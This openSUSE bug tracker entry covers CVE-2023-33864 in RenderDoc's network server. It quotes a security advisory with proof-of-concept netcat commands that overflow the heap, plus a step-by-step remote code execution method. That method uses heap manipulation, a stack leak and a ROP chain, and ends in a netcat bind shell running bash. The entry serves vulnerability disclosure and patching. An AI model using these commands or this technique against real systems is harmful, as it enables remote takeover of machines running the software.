Bug 1212088 (CVE-2023-33864) - VUL-0: CVE-2023-33864: renderdoc: integer underflow to heap-based buffer overflow
Status: RESOLVED FIXED
Alias: CVE-2023-33864
Product: openSUSE Distribution
Classification: openSUSE
Component: Security
Version: Leap 15.4
Hardware: Other Other
Importance: P3 - Medium : Normal
Target Milestone: ---
Assignee: Security Team bot
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/368570/
Reported: 2023-06-07 07:51 UTC by Gabriele Sonnu
Modified: 2024-05-13 14:37 UTC

Found By: Security Response Team


Description Gabriele Sonnu 2023-06-07 07:51:26 UTC
From oss-security:

- CVE-2023-33864, an integer underflow that results in a heap-based
  buffer overflow that is exploitable by any remote attacker to execute
  arbitrary code on the machine that runs RenderDoc. The unusual malloc
  exploitation technique that we used to exploit this vulnerability is
  reliable, one-shot, and works despite all the latest glibc, ASLR, PIE,
  NX, and stack-canary protections.

------------------------------------------------------------------------
Analysis
------------------------------------------------------------------------

When a client connects to librenderdoc.so's server thread on TCP port
38920, it must first send a handshake packet that contains a string, its
"client name"; to read this string, the server:

- malloc()ates an intermediary buffer of 64KB (at line 97), and reads
  the beginning of the client's handshake packet into this buffer:

------------------------------------------------------------------------
 42 static const uint64_t initialBufferSize = 64 * 1024;
 ..
 92 StreamReader::StreamReader(Network::Socket *sock, Ownership own)
 93 {
 94   m_Sock = sock;
 95 
 96   m_BufferSize = initialBufferSize;
 97   m_BufferBase = AllocAlignedBuffer(m_BufferSize);
 98   m_BufferHead = m_BufferBase;
 99 
100   // for sockets we use m_InputSize to indicate how much data has been read into the buffer.
101   m_InputSize = 0;
------------------------------------------------------------------------

- reads len, the length of the client-name string, from this
  intermediary buffer (at line 1313), and malloc()ates a string buffer
  of len bytes (at line 1314):

------------------------------------------------------------------------
1307   void SerialiseValue(SDBasic type, size_t byteSize, rdcstr &el)
1308   {
1309     uint32_t len = 0;
1310 
1311     if(IsReading())
1312     {
1313       m_Read->Read(len);
1314       el.resize((int)len);
1315       if(len > 0)
1316         m_Read->Read(&el[0], len);
------------------------------------------------------------------------

- reads the client name directly into this string buffer (at line 185)
  if it is at least 10MB long (otherwise the server first reads the
  client name into the intermediary buffer, and then memcpy()s it into
  the string buffer):

------------------------------------------------------------------------
139   bool Read(void *data, uint64_t numBytes)
140   {
...
183         if(numBytes >= 10 * 1024 * 1024 && Available() + 128 < numBytes)
184         {
185           success = ReadLargeBuffer(data, numBytes);
------------------------------------------------------------------------
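
The condition at line 183 can be modelled in a few lines. This is a
minimal sketch in Python, not RenderDoc code: the function name is
hypothetical, and treating Available() as "bytes already buffered" is
an assumption, since the advisory does not define it.

```python
LARGE_READ_THRESHOLD = 10 * 1024 * 1024  # constant from line 183
TAIL_BYTES = 128                         # constant from line 183


def takes_large_read_path(num_bytes, available):
    """Mirror the test quoted at line 183 of Read().

    `available` stands in for the return value of Available()
    (assumed here to be the number of bytes already buffered).
    """
    return (num_bytes >= LARGE_READ_THRESHOLD
            and available + TAIL_BYTES < num_bytes)
```

For example, takes_large_read_path(10485888, 0) is true, whereas any
request shorter than 10MB stays on the buffered path.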

More precisely, ReadLargeBuffer() reads all but the last 128 bytes of
the client name directly into the string buffer (at line 304), and reads
the last 128 bytes into the intermediary buffer (at line 354) and then
memcpy()s them into the string buffer (at line 358):

------------------------------------------------------------------------
271 bool StreamReader::ReadLargeBuffer(void *buffer, uint64_t length)
272 {
...
275   byte *dest = (byte *)buffer;
...
297     uint64_t directReadLength = length - 128;
...
304       bool ret = ReadFromExternal(dest, directReadLength);
305 
306       dest += directReadLength;
...
350   m_BufferHead = m_BufferBase + m_BufferSize;
...
354   bool ret = ReadFromExternal(m_BufferHead - 128, 128);
...
357   if(dest && ret)
358     memcpy(dest, m_BufferHead - 128, 128);
------------------------------------------------------------------------
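
The split performed by ReadLargeBuffer() can be sketched as follows.
This is an illustrative Python model only; the function name is
hypothetical and the error handling is an assumption (the excerpt does
not show what happens for lengths below 128).

```python
TAIL_BYTES = 128  # constant from lines 297 and 354


def split_large_read(length):
    """Return (direct_read_length, tail_length).

    direct_read_length models line 297 (length - 128): these bytes go
    straight into the caller's buffer. The remaining 128 bytes are
    staged in the intermediary buffer and then copied (lines 354-358).
    """
    if length < TAIL_BYTES:
        # Assumption: the excerpt never reaches this case, because
        # the caller only takes this path for lengths of 10MB or more.
        raise ValueError("length must be at least 128 bytes")
    return length - TAIL_BYTES, TAIL_BYTES
```

For a declared length of 10485888 bytes this gives a direct read of
exactly 10485760 bytes, followed by the 128-byte tail.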

Unfortunately, ReadFromExternal() mistakenly believes that m_InputSize
(the total number of bytes read) can never exceed m_BufferSize (the size
of the intermediary buffer), but in ReadLargeBuffer()'s case m_InputSize
becomes larger than 10MB and m_BufferSize is 64KB, so the calculation of
bufSize underflows (at line 408) and the size that is passed to recv()
is much larger than the size of the destination buffer (at line 411):

------------------------------------------------------------------------
366 bool StreamReader::ReadFromExternal(void *buffer, uint64_t length)
367 {
...
399       byte *readDest = (byte *)buffer;
400 
401       success = m_Sock->RecvDataBlocking(readDest, (uint32_t)length);
402 
403       if(success)
404       {
405         m_InputSize += length;
406         readDest += length;
407 
408         uint32_t bufSize = uint32_t(m_BufferSize - m_InputSize);
...
411         success = m_Sock->RecvDataNonBlocking(readDest, bufSize);
------------------------------------------------------------------------
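
The arithmetic at line 408 can be reproduced outside of C++. The sketch
below models the unsigned 64-bit subtraction and the truncation to
uint32_t with explicit masks. The function names are hypothetical, and
the guarded variant is only one possible way to avoid the underflow; it
is not claimed to be the fix that RenderDoc shipped. The m_InputSize
value in the usage note is inferred from the proof of concept (16 bytes
before the string data, then 10485760 bytes read directly), not stated
in the advisory.

```python
U32_MASK = 0xFFFFFFFF
U64_MASK = 0xFFFFFFFFFFFFFFFF


def buf_size_as_computed(buffer_size, input_size):
    """Model line 408: uint32_t(m_BufferSize - m_InputSize)."""
    diff_u64 = (buffer_size - input_size) & U64_MASK  # unsigned wrap
    return diff_u64 & U32_MASK                        # cast to uint32_t


def buf_size_guarded(buffer_size, input_size):
    """Hypothetical guard: report no free space once the running
    input count has reached or passed the buffer size."""
    if input_size >= buffer_size:
        return 0
    return min(buffer_size - input_size, U32_MASK)
```

With buffer_size = 64 * 1024 and input_size = 16 + 10485760, the first
function returns 4284547056, which is the size seen in the recvfrom()
calls of the strace output; the guarded variant returns 0.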

Consequently, a remote attacker can overflow either the string buffer
(at line 304) or the intermediary buffer (at line 354). In the following
section, we explain how we transformed the overflow of the intermediary
buffer into a reliable, one-shot remote code execution, despite all the
latest glibc, malloc, ASLR, PIE, NX, and stack-canary protections.

Proof of concept (string-buffer overflow):

------------------------------------------------------------------------
alice$ strace -f -o strace.out -E LD_PRELOAD=/usr/lib/librenderdoc.so sleep 600
------------------------------------------------------------------------
remote$ printf '\2\0\0\0\0\0\0\0\1\0\0\0\x80\x00\xa0\x00%010485760x%04096x' 1 1 | nc -nv 192.168.56.126 38920
Ncat: 10489872 bytes sent, 0 bytes received in 0.12 seconds.
------------------------------------------------------------------------
alice$ cat strace.out
...
2638  recvfrom(5, "00000000000000000000000000000000"..., 4284547056, 0, NULL, NULL) = 4096
...
2638  recvfrom(5, "", 128, 0, NULL, NULL) = 0
...
2638  writev(2, [{iov_base="Fatal glibc error: malloc assert"..., iov_len=47}, {iov_base="__libc_malloc", iov_len=13}, {iov_base=": ", iov_len=2}, {iov_base="!victim || chunk_is_mmapped (mem"..., iov_len=98}, {iov_base="\n", iov_len=1}], 5) = 161
...
2638  --- SIGABRT {si_signo=SIGABRT, si_code=SI_TKILL, si_pid=2637, si_uid=1000} ---
2637  <... clock_nanosleep resumed> <unfinished ...>) = ?
2638  +++ killed by SIGABRT +++
2637  +++ killed by SIGABRT +++
------------------------------------------------------------------------
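
The byte counts in this proof of concept can be checked by hand. The
Python sketch below does so under one assumption: that the 4 bytes
following the 12-byte prefix are len, encoded as a little-endian
uint32. The advisory does not describe the wire format, so the prefix
is copied verbatim from the printf and its meaning is not interpreted.
Nothing is sent over the network; only lengths are computed.

```python
import struct

# Copied verbatim from the printf in the proof of concept.
PREFIX = b"\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
LEN_FIELD = b"\x80\x00\xa0\x00"


def declared_length():
    """Decode LEN_FIELD as a little-endian uint32 (assumption)."""
    return struct.unpack("<I", LEN_FIELD)[0]


def bytes_sent(pad_widths):
    """Total bytes written by printf: prefix, length field, and one
    zero-padded hex field per width (e.g. %010485760x -> 10485760)."""
    return len(PREFIX) + len(LEN_FIELD) + sum(pad_widths)
```

declared_length() is 10485888, i.e. 10MB + 128, so the direct read
covers exactly the 10485760 padding bytes, and
bytes_sent([10485760, 4096]) is 10489872, matching the Ncat output.
The trailing 4096 bytes are the ones returned by the oversized
recvfrom().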

Proof of concept (intermediary-buffer overflow):

------------------------------------------------------------------------
alice$ strace -f -o strace.out -E LD_PRELOAD=/usr/lib/librenderdoc.so sleep 600
------------------------------------------------------------------------
remote$ (printf '\2\0\0\0\0\0\0\0\1\0\0\0\x80\x00\xa0\x00%010485760x' 1; sleep 3; printf '%0128x%04096x' 1 1) | nc -nv 192.168.56.126 38920
Ncat: 10490000 bytes sent, 0 bytes received in 3.11 seconds.
------------------------------------------------------------------------
alice$ cat strace.out
...
2696  recvfrom(5, 0x7f725a9ff010, 4284547056, 0, NULL, NULL) = -1 EAGAIN (Resource temporarily unavailable)
...
2696  recvfrom(5, "00000000000000000000000000000000"..., 128, 0, NULL, NULL) = 128
...
2696  recvfrom(5, "00000000000000000000000000000000"..., 4284546928, 0, NULL, NULL) = 4096
...
2696  writev(2, [{iov_base="malloc(): corrupted top size", iov_len=28}, {iov_base="\n", iov_len=1}], 2) = 29
...
2696  --- SIGABRT {si_signo=SIGABRT, si_code=SI_TKILL, si_pid=2695, si_uid=1000} ---
2695  <... clock_nanosleep resumed> <unfinished ...>) = ?
2696  +++ killed by SIGABRT +++
2695  +++ killed by SIGABRT +++
------------------------------------------------------------------------
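
The two oversized recvfrom() sizes in this trace follow directly from
lines 405 and 408. The Python sketch below replays them; it assumes
that the non-blocking recv after the first read returns no data (the
EAGAIN above), so that m_InputSize only grows by the blocking reads.
The function names and the starting value of 16 are inferred from the
proof of concept, not taken from RenderDoc.

```python
U32_MASK = 0xFFFFFFFF
BUFFER_SIZE = 64 * 1024  # initialBufferSize, line 42
TAIL_BYTES = 128


def nonblocking_recv_sizes(initial_input_size, blocking_read_lengths):
    """Return the bufSize passed to RecvDataNonBlocking() after each
    blocking read, following lines 405 and 408."""
    sizes = []
    input_size = initial_input_size
    for length in blocking_read_lengths:
        input_size += length                                 # line 405
        sizes.append((BUFFER_SIZE - input_size) & U32_MASK)  # line 408
    return sizes


def tail_overflow_offset():
    """Offset, relative to m_BufferBase, where the second oversized
    recv writes: (m_BufferHead - 128) + 128 with m_BufferHead at
    m_BufferBase + m_BufferSize (lines 350, 354, 406)."""
    return (BUFFER_SIZE - TAIL_BYTES) + TAIL_BYTES
```

nonblocking_recv_sizes(16, [10485760, 128]) yields 4284547056 and then
4284546928, as in the trace, and tail_overflow_offset() is 65536: the
4096 attacker-supplied bytes land immediately past the end of the
intermediary buffer.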

------------------------------------------------------------------------
Exploitation
------------------------------------------------------------------------

1/ When librenderdoc.so's server thread is created, the glibc's malloc
allocates a new "heap" for this thread: 64MB of mmap()ed memory, whose
start address is aligned on a multiple of 64MB. Initially, this heap is
mmap()ed PROT_NONE, and is mprotect()ed read-write as needed by malloc:

    0                                       64M
----V----------------------------------------V--------------|-------------
    |          server thread's heap          |  random gap  |  libraries
----|----------------------------------------|--------------|-------------

Note: the gap of unmapped memory between the heap and the libraries is
random (and smaller than 64MB), because the heap is aligned on 64MB but
the libraries are randomly aligned on 4KB (or sometimes 2MB) by ASLR.
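
The alignment property described above can be illustrated with a short
Python sketch. All addresses are hypothetical examples, and the helper
names are ours; only the 64MB heap size and alignment come from the
text.

```python
HEAP_SIZE = 64 * 1024 * 1024  # size and alignment of a thread heap


def heap_start(addr):
    """Round an address inside a thread heap down to the 64MB
    boundary on which that heap starts."""
    return addr & ~(HEAP_SIZE - 1)


def gap_to_libraries(heap_base, lib_base):
    """Size of the unmapped gap between the end of the heap and the
    first library mapping above it."""
    return lib_base - (heap_base + HEAP_SIZE)
```

For a hypothetical chunk at 0x7f7254012340 the heap starts at
0x7f7254000000, and with libraries starting at a hypothetical
0x7f725a3c5000 the gap is 0x23c5000 bytes (about 35.8MB), which is
below 64MB as the note states.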

2/ We (remote attackers) establish 7 successive connections to the
server on TCP port 38920: for each one of these connections, the server
creates a new thread (a "client thread"), allocates a new thread stack
(8MB+4KB of mmap()ed memory, for the stack and its guard page), and then
memory-leaks this stack (because the server does not call pthread_join()
when the client thread terminates abnormally, which prevents its stack
from being freed or reused for another client thread).

The goal of this step 2/ is simply to fill the random gap between the
heap and the libraries (with the help of a memory leak), to prevent any
future thread stack from being allocated into this gap. The reason for
doing this will become clear in step 7/.
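
One way to read the choice of 7 connections (our interpretation; the
advisory does not spell it out): the gap is smaller than 64MB and each
leaked stack mapping is 8MB+4KB, so 7 is the smallest number of
mappings after which the remainder of even a maximal gap is too small
for another stack. The Python sketch below checks this, assuming the
leaked stacks are placed in the gap whenever they fit.

```python
MB = 1024 * 1024
KB = 1024

STACK_MAPPING = 8 * MB + 4 * KB  # thread stack plus guard page
MAX_GAP = 64 * MB                # upper bound on the random gap


def stacks_needed(max_gap=MAX_GAP, mapping=STACK_MAPPING):
    """Smallest n such that max_gap - n * mapping < mapping, i.e. no
    further stack mapping can fit into what is left of the gap."""
    n = 0
    while max_gap - n * mapping >= mapping:
        n += 1
    return n
```

stacks_needed() returns 7: seven mappings cover 58748928 bytes, which
leaves at most 8359936 bytes, less than the 8392704 bytes that one
more stack and guard page would need.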

3/ We connect to the server on TCP port 38920, send a handshake packet
that contains a 16MB client-name string (it must be at least 10MB long
to trigger CVE-2023-33864), and obtain the following layout for the
server's heap:

  0                           14M  16M      20M              28M      32M
--V-+-+-+-+--------------------V----V--------V----------------V--------V--
  |F|I|L|C|               ....
--|-+-+-+-+---------------------------------------------------------------

- F are fixed chunks of memory (at the very beginning of the heap) that
  were not allocated by us but whose sizes are known to us;

- I is the 64KB intermediary buffer mentioned in the previous section;

- L is a small chunk that was memory-leaked (or free()d but stored in an
  otherwise unused tcache) and whose size is exactly controlled by us;

- C is a small chunk (a "callstack" from our handshake packet) whose
  exact size and contents do not matter much.

4/ We overflow the intermediary buffer I (thanks to CVE-2023-33864),
overwrite L's malloc_chunk header with an unchanged size field, and
overwrite C's malloc_chunk header with arbitrary prev_size and size
fields.

5/ The server free()s the intermediary buffer I. This free() succeeds
despite our buffer overflow because we overwrote the malloc_chunk header
of I's next chunk (L) with an unchanged size; without L between I and C,
free()'s security checks would detect that we overwrote C's malloc_chunk
header with arbitrary sizes and would abort().

6/ The server free()s the small chunk C. Because we overwrote C's
malloc_chunk header with a size field whose IS_MMAPPED bit is set,
free() calls its internal function munmap_chunk():

------------------------------------------------------------------------
3018 static void
3019 munmap_chunk (mchunkptr p)
3020 {
3021   size_t pagesize = GLRO (dl_pagesize);
3022   INTERNAL_SIZE_T size = chunksize (p);
....
3026   uintptr_t mem = (uintptr_t) chunk2mem (p);
3027   uintptr_t block = (uintptr_t) p - prev_size (p);
3028   size_t total_size = prev_size (p) + size;
....
3034   if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
3035       || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
3036     malloc_printerr ("munmap_chunk(): invalid pointer");
....
3044   __munmap ((char *) block, total_size);
3045 }
------------------------------------------------------------------------

- we fully control prev_size and size (because p is a pointer to C's
  malloc_chunk header, which we overwrote), so we can munmap() an
  arbitrary block of memory (at line 3044), relative to p (i.e.,
  relative to C, and without knowing the ASLR);

- we can easily satisfy the preconditions at lines 3034 and 3035,
  because we fully control prev_size and size, and because we know the
  sizes of F and I, and we precisely control the size of L.
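
The two points above can be checked with a small Python model of the
munmap_chunk() excerpt. This is a sketch under stated assumptions: a
64-bit target with a 16-byte chunk header and 4KB pages, hypothetical
addresses, and a target block located above p, so that prev_size has
to wrap around as an unsigned 64-bit value (our inference; the
advisory only says the block is relative to p). forge_fields() is a
hypothetical helper, not part of glibc.

```python
U64 = (1 << 64) - 1
PAGE = 4096
IS_MMAPPED = 0x2
SIZE_BITS = 0x7
CHUNK_HDR = 16  # chunk2mem() offset on 64-bit (assumption)


def powerof2(x):
    """Same test as glibc's powerof2 macro; also true for 0."""
    return ((x - 1) & x) == 0


def munmap_chunk_args(p, prev_size, size_field):
    """Return (block, total_size) as passed to munmap() at line 3044,
    or None if the checks at lines 3034-3035 would abort."""
    size = size_field & ~SIZE_BITS & U64      # chunksize(p)
    mem = (p + CHUNK_HDR) & U64               # line 3026
    block = (p - prev_size) & U64             # line 3027
    total = (prev_size + size) & U64          # line 3028
    if (block | total) & (PAGE - 1) or not powerof2(mem & (PAGE - 1)):
        return None
    return block, total


def forge_fields(p, hole_start, hole_len):
    """Pick prev_size and size so that block == hole_start and
    total_size == hole_len, with the IS_MMAPPED bit set."""
    prev_size = (p - hole_start) & U64
    size = (hole_len - prev_size) & U64
    return prev_size, size | IS_MMAPPED
```

The second check constrains the page offset of p + 16 to be zero or a
power of two, which is why the position of C (and therefore the size
of L) has to be controlled precisely: with C at page offset 0xff0 the
call goes through, while at page offset 0x020 it would abort.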

We exploit this arbitrary munmap() to punch a hole of exactly 8MB+4KB
(the size of a thread stack and its guard page) in the middle of the
server's heap:

  0                           14M  16M      20M              28M      32M
--V-+-+-+-+--------------------V----V--------V----------------V--------V--
  |F|I|L|C|               ....               |  punched hole  |
--|-+-+-+-+----------------------------------+----------------+-----------

Note: we cannot reuse the technique that we developed to exploit
CVE-2005-1513 (in qmail) here, because of the random gap between the
server's heap and the libraries (and our exploit here must be one-shot);
for reference:

  https://www.qualys.com/2020/05/19/cve-2005-1513/remote-code-execution-qmail.txt
  https://maxwelldulin.com/BlogPost/House-of-Muney-Heap-Exploitation
  https://www.ambionics.io/blog/hacking-watchguard-firewalls

7/ We connect to the server on TCP port 38920; the server creates a new
client thread, and allocates a new stack for this thread, exactly into
the hole that we punched in the server's heap (since step 2/ such a
stack cannot be allocated anymore into the random gap between the
server's heap and the libraries):

  0                           14M  16M      20M              28M      32M
--V-+-+-+-+--------------------V----V--------V----------------V--------V--
  |F|I|L|C|               ....               |  client stack  |
--|-+-+-+-+----------------------------------+----------------+-----------

We then disconnect from the server; the client thread terminates cleanly
and the server pthread_join()s with it, thus making its stack available
for a future client thread.

8/ We establish a long-lived connection to the server, and send a 14MB
client-name string (but we do not trigger CVE-2023-33864 this time); the
server reads our client name into a malloc()ated string buffer that ends
in the middle of the unused client stack (i.e., this client name and the
client stack overlap in the server's heap):

  0                           14M  16M      20M              28M      32M
--V-+-+-+-+--------------------V----V--------V----------------V--------V--
  |F|I|L|C|        ....        |             |  client stack  |
--|-+-+-+-+--------------------+-------------+-------------+--+-----------
                               |---------------------------|
                                        client name

Note: although the client stack's guard page is initially mmap()ed
PROT_NONE, it is conveniently mprotect()ed read-write by the glibc's
malloc when extending the server's heap for our 14MB client name (in
grow_heap())!

The server then creates a new client thread for our long-lived
connection, and reuses the existing client stack for this thread, thus
overwriting the end of our client name with data from the client stack.

9/ We establish another connection to the server; however, because our
first connection is still alive, the server disconnects us, but first
gives us the name of the client that is already connected (i.e., the
server sends us back our 14MB client name, which was partly overwritten
by data from the client stack), thus information-leaking all sorts of
stack contents to us: heap addresses, library addresses, stack
addresses, the stack canary, etc.

10/ While our first connection to the server is still alive, we
establish another connection and start sending a 9MB string; the server
reads this string into a malloc()ated buffer that starts in the middle
of the client stack (immediately after the 14MB client name), thus
overwriting the client stack with data that we fully control (a ROP
chain):

  0                           14M  16M      20M              28M      32M
--V-+-+-+-+--------------------V----V--------V----------------V--------V--
  |F|I|L|C|        ....        |             |  client stack  |
--|-+-+-+-+--------------------+-------------+-------------+--+-----------
                               |---------------------------|--->
                                        client name         ROP

As soon as the client thread returns to a saved instruction pointer
(RIP) from the overwritten part of the client stack, our ROP chain is
executed: first a "ROP sled" (a series of minimal "ret" gadgets, because
we do not know the exact distance between the start of our ROP chain and
the first overwritten saved RIP in the client stack), followed by a
simple execve() of "/bin/nc -lp1337 -e/bin/bash".

Note: we build our ROP chain with gadgets from librenderdoc.so only
(whose address was information-leaked to us in step 9/), to avoid any
dependence on the application being debugged or its shared libraries.

To summarize this reliable, one-shot technique that we used to exploit
the heap-based buffer overflow in librenderdoc.so's multi-threaded TCP
server:

- we overwrite the malloc_chunk header of a heap-based buffer (which
  will be free()d) with an arbitrary size field whose IS_MMAPPED bit is
  set, and therefore transform this buffer overflow into an arbitrary
  munmap() call (thanks to free()'s munmap_chunk() function);

- with this arbitrary munmap() call, we punch a hole of exactly 8MB+4KB
  (the size of a thread stack) in the middle of the server's heap;

- we arrange for a thread stack to be mmap()ed into this hole, and for a
  string (which will later be sent to us by the server) to be
  malloc()ated over the lower part of this thread stack;

- when this string is sent to us by the server, parts of it were
  overwritten by data from the thread stack, thus information-leaking
  all sorts of stack contents to us (heap addresses, library addresses,
  stack addresses, the stack canary, etc);

- finally, we arrange for another string (which we fully control) to be
  malloc()ated over the higher part of the thread stack, and therefore
  overwrite a saved instruction pointer (in the thread stack) with a ROP
  chain of gadgets from librenderdoc.so (whose address was previously
  information-leaked to us) -- a classic "stack smashing" attack.

Note: further possibilities for munmap_chunk() exploitation are explored
in http://tukan.farm/2016/07/27/munmap-madness/.
Comment 2 Gabriele Sonnu 2023-06-07 07:57:47 UTC
Tracking as affected:

- openSUSE:Backports:SLE-15-SP5/renderdoc     1.24
- openSUSE:Factory/renderdoc                  1.26

Please update it to a non-vulnerable version.
Comment 3 Patrik Jakobsson 2023-06-08 07:05:19 UTC
renderdoc v1.27 is now submitted to:
  - openSUSE:Backports:SLE-15-SP5
  - openSUSE:Factory
Comment 4 Patrik Jakobsson 2023-08-30 08:30:46 UTC
The update to v1.27 was declined due to licensing issues. Instead, I've submitted an update to the v1.24 package that contains the required security fixes.

See: https://build.opensuse.org/request/show/1108054
Comment 5 Marcus Meissner 2023-09-25 13:06:00 UTC
openSUSE-SU-2023:0253-1: An update that fixes three vulnerabilities is now available.

Category: security (important)
Bug References: 1212086,1212088,1212089
CVE References: CVE-2023-33863,CVE-2023-33864,CVE-2023-33865
JIRA References: 
Sources used:
openSUSE Backports SLE-15-SP5 (src):    renderdoc-1.24-bp155.2.3.1
Comment 6 Marcus Meissner 2024-05-13 14:37:48 UTC
done